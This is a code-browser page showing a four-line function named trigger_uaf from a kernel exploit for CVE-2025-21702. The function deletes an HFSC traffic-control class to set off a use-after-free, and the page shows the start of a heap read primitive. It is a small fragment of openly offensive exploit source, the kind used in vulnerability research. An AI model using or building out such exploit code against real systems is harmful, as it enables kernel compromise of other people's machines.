MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / trigger_uaf

Function trigger_uaf

CVE-2025-21702/exploit/exploit.c:1077–1080  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

1075}
1076
1077static inline void trigger_uaf(struct mnl_socket *route_socket, int ifindex, u32 hfsc_classid)
1078{
1079 delete_tclass(route_socket, ifindex, TC_H_MAJ(hfsc_classid), hfsc_classid);
1080}
1081
1082void heap_read_primitive_init(
1083 struct heap_read_primitive *heap_read_primitive,

Calls 1

delete_tclassFunction · 0.85

Tested by

no test coverage detected